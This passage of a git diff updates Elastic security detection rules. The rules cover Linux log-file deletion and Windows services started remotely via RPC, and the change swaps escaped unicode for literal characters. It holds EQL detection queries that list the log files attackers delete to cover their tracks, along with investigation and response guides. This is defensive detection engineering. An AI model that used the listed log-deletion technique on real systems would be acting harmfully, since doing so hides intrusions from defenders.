`event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).", "query": "file where host.os.type == \"linux\" and event.type == \"deletion\" and\n file.path :\n (\n \"/var/run/utmp\",\n \"/var/log/wtmp\",\n \"/var/log/btmp\",\n \"/var/log/lastlog\",\n \"/var/log/faillog\",\n \"/var/log/syslog\",\n \"/var/log/messages\",\n \"/var/log/secure\",\n \"/var/log/auth.log\",\n \"/var/log/boot.log\",\n \"/var/log/kern.log\"\n ) and\n not process.name : (\"gzip\")\n", "references": [ "https://www.fireeye.com/blog/threat-research/2020/11/live-off-the-land-an-overview-of-unc1945.html" @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/aa895aea-b69c-4411-b110-8d7599634b30_108.json b/packages/security_detection_engine/kibana/security_rule/aa895aea-b69c-4411-b110-8d7599634b30_108.json index 8c8cc7def4f..6c5d868b628 100644 --- a/packages/security_detection_engine/kibana/security_rule/aa895aea-b69c-4411-b110-8d7599634b30_108.json +++ b/packages/security_detection_engine/kibana/security_rule/aa895aea-b69c-4411-b110-8d7599634b30_108.json @@ -47,7 +47,7 @@ ], "risk_score": 47, "rule_id": "aa895aea-b69c-4411-b110-8d7599634b30", - "setup": "\nThis rule requires data coming in either from Elastic Defend, or Auditbeat integration.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat for Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete Setup and Run Auditbeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions \u003c8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n", + "setup": "\nThis rule requires data coming in either from Elastic Defend, or Auditbeat integration.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat for Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete Setup and Run Auditbeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/aa895aea-b69c-4411-b110-8d7599634b30_109.json b/packages/security_detection_engine/kibana/security_rule/aa895aea-b69c-4411-b110-8d7599634b30_109.json index c56e7a5fc1d..e2039b7dcf9 100644 --- a/packages/security_detection_engine/kibana/security_rule/aa895aea-b69c-4411-b110-8d7599634b30_109.json +++ b/packages/security_detection_engine/kibana/security_rule/aa895aea-b69c-4411-b110-8d7599634b30_109.json @@ -47,7 +47,7 @@ ], "risk_score": 47, "rule_id": "aa895aea-b69c-4411-b110-8d7599634b30", - "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions \u003c8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n", + "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/aa9a274d-6b53-424d-ac5e-cb8ca4251650_104.json b/packages/security_detection_engine/kibana/security_rule/aa9a274d-6b53-424d-ac5e-cb8ca4251650_104.json index 2b33e279993..3d8040f965d 100644 --- a/packages/security_detection_engine/kibana/security_rule/aa9a274d-6b53-424d-ac5e-cb8ca4251650_104.json +++ b/packages/security_detection_engine/kibana/security_rule/aa9a274d-6b53-424d-ac5e-cb8ca4251650_104.json @@ -13,8 +13,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Remotely Started Services via RPC", - "note": "## Triage and analysis\n\n### Investigating Remotely Started Services via RPC\n\nThe Service Control Manager Remote Protocol is a client/server protocol used for configuring and controlling service programs running on a remote computer. A remote service management session begins with the client initiating the connection request to the server. If the server grants the request, the connection is established. The client can then make multiple requests to modify, query the configuration, or start and stop services on the server by using the same session until the session is terminated.\n\nThis rule detects the remote creation or start of a service by correlating a `services.exe` network connection and the spawn of a child process.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Review login events (e.g., 4624) in the alert timeframe to identify the account used to perform this action. Use the `source.address` field to help identify the source system.\n- Review network events from the source system using the source port identified on the alert and try to identify the program used to initiate the action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- Remote management software like SCCM may trigger this rule. If noisy on your environment, consider adding exceptions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", - "query": "sequence with maxspan=1s\n [network where host.os.type == \"windows\" and process.name : \"services.exe\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and\n source.port \u003e= 49152 and destination.port \u003e= 49152 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by host.id, process.entity_id\n\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"services.exe\" and\n not (process.name : \"svchost.exe\" and process.args : \"tiledatamodelsvc\") and\n not (process.name : \"msiexec.exe\" and process.args : \"/V\") and\n not process.executable :\n (\"?:\\\\Windows\\\\ADCR_Agent\\\\adcrsvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\VSSVC.exe\",\n \"?:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Windows\\\\PSEXESVC.EXE\",\n \"?:\\\\Windows\\\\System32\\\\sppsvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe\",\n \"?:\\\\WINDOWS\\\\RemoteAuditService.exe\",\n \"?:\\\\Windows\\\\VeeamVssSupport\\\\VeeamGuestHelper.exe\",\n \"?:\\\\Windows\\\\VeeamLogShipper\\\\VeeamLogShipper.exe\",\n \"?:\\\\Windows\\\\CAInvokerService.exe\",\n \"?:\\\\Windows\\\\System32\\\\upfc.exe\",\n \"?:\\\\Windows\\\\AdminArsenal\\\\PDQ*.exe\",\n \"?:\\\\Windows\\\\System32\\\\vds.exe\",\n \"?:\\\\Windows\\\\Veeam\\\\Backup\\\\VeeamDeploymentSvc.exe\",\n \"?:\\\\Windows\\\\ProPatches\\\\Scheduler\\\\STSchedEx.exe\",\n \"?:\\\\Windows\\\\System32\\\\certsrv.exe\",\n \"?:\\\\Windows\\\\eset-remote-install-service.exe\",\n \"?:\\\\Pella Corporation\\\\Pella Order Management\\\\GPAutoSvc.exe\",\n \"?:\\\\Pella Corporation\\\\OSCToGPAutoService\\\\OSCToGPAutoSvc.exe\",\n \"?:\\\\Pella Corporation\\\\Pella Order Management\\\\GPAutoSvc.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\NwxExeSvc\\\\NwxExeSvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\taskhostex.exe\")\n ] by host.id, process.parent.entity_id\n", + "note": "## Triage and analysis\n\n### Investigating Remotely Started Services via RPC\n\nThe Service Control Manager Remote Protocol is a client/server protocol used for configuring and controlling service programs running on a remote computer. A remote service management session begins with the client initiating the connection request to the server. If the server grants the request, the connection is established. The client can then make multiple requests to modify, query the configuration, or start and stop services on the server by using the same session until the session is terminated.\n\nThis rule detects the remote creation or start of a service by correlating a `services.exe` network connection and the spawn of a child process.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Review login events (e.g., 4624) in the alert timeframe to identify the account used to perform this action. Use the `source.address` field to help identify the source system.\n- Review network events from the source system using the source port identified on the alert and try to identify the program used to initiate the action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- Remote management software like SCCM may trigger this rule. If noisy on your environment, consider adding exceptions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence with maxspan=1s\n [network where host.os.type == \"windows\" and process.name : \"services.exe\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and\n source.port >= 49152 and destination.port >= 49152 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by host.id, process.entity_id\n\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"services.exe\" and\n not (process.name : \"svchost.exe\" and process.args : \"tiledatamodelsvc\") and\n not (process.name : \"msiexec.exe\" and process.args : \"/V\") and\n not process.executable :\n (\"?:\\\\Windows\\\\ADCR_Agent\\\\adcrsvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\VSSVC.exe\",\n \"?:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Windows\\\\PSEXESVC.EXE\",\n \"?:\\\\Windows\\\\System32\\\\sppsvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe\",\n \"?:\\\\WINDOWS\\\\RemoteAuditService.exe\",\n \"?:\\\\Windows\\\\VeeamVssSupport\\\\VeeamGuestHelper.exe\",\n \"?:\\\\Windows\\\\VeeamLogShipper\\\\VeeamLogShipper.exe\",\n \"?:\\\\Windows\\\\CAInvokerService.exe\",\n \"?:\\\\Windows\\\\System32\\\\upfc.exe\",\n \"?:\\\\Windows\\\\AdminArsenal\\\\PDQ*.exe\",\n \"?:\\\\Windows\\\\System32\\\\vds.exe\",\n \"?:\\\\Windows\\\\Veeam\\\\Backup\\\\VeeamDeploymentSvc.exe\",\n \"?:\\\\Windows\\\\ProPatches\\\\Scheduler\\\\STSchedEx.exe\",\n \"?:\\\\Windows\\\\System32\\\\certsrv.exe\",\n \"?:\\\\Windows\\\\eset-remote-install-service.exe\",\n \"?:\\\\Pella Corporation\\\\Pella Order Management\\\\GPAutoSvc.exe\",\n \"?:\\\\Pella Corporation\\\\OSCToGPAutoService\\\\OSCToGPAutoSvc.exe\",\n \"?:\\\\Pella Corporation\\\\Pella Order Management\\\\GPAutoSvc.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\NwxExeSvc\\\\NwxExeSvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\taskhostex.exe\")\n ] by host.id, process.parent.entity_id\n", "references": [ "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-scmr/705b624a-13de-43cc-b8a2-99573da3635f" ], @@ -113,7 +113,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/aa9a274d-6b53-424d-ac5e-cb8ca4251650_105.json b/packages/security_detection_engine/kibana/security_rule/aa9a274d-6b53-424d-ac5e-cb8ca4251650_105.json index 00094fc9c48..5116c10a92b 100644 --- a/packages/security_detection_engine/kibana/security_rule/aa9a274d-6b53-424d-ac5e-cb8ca4251650_105.json +++ b/packages/security_detection_engine/kibana/security_rule/aa9a274d-6b53-424d-ac5e-cb8ca4251650_105.json @@ -13,8 +13,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Remotely Started Services via RPC", - "note": "## Triage and analysis\n\n### Investigating Remotely Started Services via RPC\n\nThe Service Control Manager Remote Protocol is a client/server protocol used for configuring and controlling service programs running on a remote computer. A remote service management session begins with the client initiating the connection request to the server. If the server grants the request, the connection is established. The client can then make multiple requests to modify, query the configuration, or start and stop services on the server by using the same session until the session is terminated.\n\nThis rule detects the remote creation or start of a service by correlating a `services.exe` network connection and the spawn of a child process.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Review login events (e.g., 4624) in the alert timeframe to identify the account used to perform this action. Use the `source.address` field to help identify the source system.\n- Review network events from the source system using the source port identified on the alert and try to identify the program used to initiate the action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- Remote management software like SCCM may trigger this rule. If noisy on your environment, consider adding exceptions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same 